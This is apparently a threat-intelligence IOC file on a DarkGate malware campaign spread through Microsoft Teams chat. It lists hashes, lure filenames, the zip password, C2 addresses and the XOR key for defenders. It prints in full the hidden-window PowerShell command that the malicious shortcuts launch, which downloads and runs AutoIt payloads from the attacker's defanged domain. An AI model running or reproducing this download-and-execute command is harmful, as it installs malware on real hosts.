2023-10-12-IOCs-for-DarkGate-from-Teams-chat.txt

2023-10-12 (THURSDAY): DARKGATE INFECTION FROM TEAMS CHAT

REFERENCES:

- https://www.linkedin.com/posts/unit42_darkgate-timelythreatintelligence-threatintel-activity-7118377814826905600-idoc
- https://twitter.com/Unit42_Intel/status/1712612195651998098

NOTES:

- This infection chain has been reported through mulitple sources as early as September 2023.

SOME REFERENCES FOLLOW:

- https://www.techrepublic.com/article/darkgate-loader-malware-microsoft-teams/
- https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-attack-pushes-darkgate-malware/
- https://www.malwarebytes.com/blog/news/2023/09/microsoft-teams-used-to-deliver-darkgate-loader-malware

INFECTION CHAIN:

- Teams chat message --> password-protected zip archive --> extracted Windows shortcuts -->
  Powershell command string --> AutoIt3 & .au3 script --> encoded binary for DarkGate --> DarkGate C2

PASSWORD-PROTECTED ZIP ARCHIVES:

- Password: Company2023

- 36bc501e5fb8520c1b713d70251424fa484f045abbb205682ff445f46f3d1201 - 8,937 bytes - Company Update October 2023.zip
- 4877106143a7fc8871614f2e19c51e9f7f4ff77ed5990881c9714422d3cb4c0b - 8,937 bytes - Company Update October 2023.zip
- 73d2a8c1ba0860fef33ff46da8880ceb00c6a355a6bba14758be83fc17c845ab - 6,427 bytes - Navigating Future Changes 2023.zip
- 8fa71bb4079780710ca354a312f5a887fe7bd9f3a744e43c19f5eb87aed65c0f - 6,427 bytes - Navigating Future Changes 2023.zip

CONTENTS OF BOTH "COMPANY UPDATE OCTOBER 2023" ZIP ARCHIVES:

- SHA256 hash: ba18f678b08580795416148d2bba5b0a0b7be4c85b8501a28f49c8141268ec57
- File size: 2,854 bytes
- File names:
  -- 01_Strategic_Transformations_2023_Confidential.pdf.lnk
  -- 02_Organizational_Structure_Update_2023_Confidential.pdf.lnk
  -- 03_New_Mission_and_Core_Values_2023_Confidential.pdf.lnk
  -- 04_Employees_Affected_by_Transition_2023_Confidential.pdf.lnk
  -- 05_Position_Guidelines_October_2023_Confidential.pdf.lnk
  -- 06_FAQs_and_Support_Resources_2023_Confidential.pdf.lnk
  -- 07_Next_Steps_and_Timeline_2023_Confidential.pdf.lnk

- SHA256 hash: 4afbeb1589b96d9e1c3bf88ef1e528a87c6d580092d7552db53819e503ab2458
- File size: 2,854 bytes
- File names: 
  -- Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.pdf.lnk
  -- Navigating_Our_Evolution_October_2023_Confidential.pdf.lnk
  -- Redefining_Our_Structural_Canvas_2023_Confidential.pdf.lnk
  -- Role_Directives_Effective_2023_Confidential.pdf.lnk
  -- Transition_Journey_2023_Confidential.pdf.lnk

- SHA256 hash: 7b03a759123dbb2429e1e7a506e5281b3ecc0d4a655bf5affc3650f9d8e20a24
- File size: 2,854 bytes
- File names: 
  -- Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.pdf.lnk
  -- Navigating_Our_Evolution_October_2023_Confidential.pdf.lnk
  -- Redefining_Our_Structural_Canvas_2023_Confidential.pdf.lnk
  -- Role_Directives_Effective_2023_Confidential.pdf.lnk
  -- Transition_Journey_2023_Confidential.pdf.lnk

EXAMPLE OF POWERSHELL COMMAND GENERATED BY THE ABOVE WINDOWS SHORTCUTS:

  %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe

  -WindowStyle Hidden -Command "&{ ni "C:\temp" -Type Directory -Force;
  cd "C:\temp"; 
  Invoke-WebRequest -Uri "hxxp://hgfdytrywq[.]com:80/a" -OutFile "AutoIt3.exe";
  Invoke-WebRequest -Uri "hxxp://hgfdytrywq[.]com:80/xmbxmi" -OutFile "nAdowY.au3";
  start "AutoIt3.exe" -a "nAdowY.au3"}"

EXAMPLES OF DOWNLOADED .AU3 SCRIPT FILES:

- c01d186f412fac04b0b80c6242c378ee00d1c63affb83d44ee75f65a08f4e966 - 12,815 bytes - nAdowY.au3
- d841110e05dc8970c1f96ec038ff98a4f463c2b5e96d114a84e4c3bb97628797 - 12,584 bytes - oWUNju.au3
- c786fba049049139859c8d552f957780628b437c11af0720c0c13481897b7244 - 12,708 bytes - qBQslF.au3

INITIAL TRAFFIC FROM AN INFECTED WINDOWS HOST:

- 104.21.91[.]46 port 80 - hgfdytrywq[.]com - GET /a HTTP/1.1  <-- copy of AutoIt3.exe
- 104.21.91[.]46 port 80 - hgfdytrywq[.]com - GET /gdlxsh HTTP/1.1  <-- .au3 file
- 104.21.91[.]46 port 80 - hgfdytrywq[.]com - GET /yjnchp HTTP/1.1  <-- encoded binary for DarkGate EXE

POST-INFECTION C2:

- 172.67.166[.]185 port 8080 - hgfdytrywq[.]com:8080 - POST / HTTP/1.0
- 172.67.166[.]185 port 80 - hgfdytrywq[.]com - POST / HTTP/1.0

POST-INFECTION MALWARE/ARTIFACTS:

- SHA256 hash: 307e554435ba5edc9c2b1d11e940d5656f748bd399465ae05dfc4a40e30a363f
- File size: 397,320 bytes
- File location: hxxp://hgfdytrywq[.]com/yjnchp
- File description: XOR-encoded binary retrieved by .au3 file
- Note: 8-byte ASCII string used to XOR-encode this binary: kREMUwNi

- SHA256 hash: 7fc3126b9c53816657076b62188f9905067ec4b070deea5999cd6d7aa3c85c76
- File size: 397,312 bytes
- File description: Decoded DarkGate EXE